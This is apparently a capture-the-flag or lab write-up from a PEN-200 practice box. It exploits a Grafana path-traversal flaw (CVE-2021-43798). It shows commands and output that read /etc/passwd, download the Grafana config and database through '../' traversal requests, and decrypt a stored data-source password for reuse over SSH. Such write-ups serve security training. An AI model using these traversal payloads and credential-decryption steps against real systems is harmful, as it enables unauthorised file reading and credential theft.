Fanatastic_Exploitation

Exploitation

---

The target Grafana instance is running the version v8.3.0 (914fcedb72), leaving it vulnerable to CVE-2021-43798

CVE-2021-43798

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ python3 CVE-2021-43798.py -H http://$IP:3000/
Read file > /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
grafana:x:113:117::/usr/share/grafana:/bin/false
prometheus:x:1000:1000::/home/prometheus:/bin/false
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh

Confirming the 2nd exploit

Data Source Secret Decryption

---

Leveraging the CVE-2021-43798, I can recover the Grafana files to attempt to decrypt data source secret

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ curl -s --path-as-is "http://$IP:3000/public/plugins/welcome/../../../../../../../../../../../etc/grafana/grafana.ini" --output grafana.ini    
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ curl -s --path-as-is "http://$IP:3000/public/plugins/welcome/../../../../../../../../../../../var/lib/grafana/grafana.db" --output grafana.db

2 required files are;

• Grafana configuration file; /etc/grafana/grafana.ini
• Grafana database file; /var/lib/grafana/grafana.db

grafana.ini

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ grep secret_key grafana.ini
;secret_key = SW2YcwTIb9zpOOhoPsMm
# current key provider used for envelope encryption, default to static value specified by secret_key
;secret_key =

It’s using the default secret key; SW2YcwTIb9zpOOhoPsMm

grafana.db

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fanatastic]
└─$ open grafana.db

Opening up the SQLite DB

Grafana Credential

---

There is the password hash for the admin user There is a tool to convert this to a crack-able hashcat-friendly hashstring, but hashcat was unable to crack the password hash

data_source Table

---

The data_source table is what’s important as it contains the credential for the target Prometheus instance and it’s set to the sysadmin user

Decryption

---

Now the decryption script must be updated

Executing the decryption script reveals the password; SuperSecureP@ssw0rd Given there is no authentication endpoint at the web GUI of the target Prometheus instance, I can test this password against the target SSH server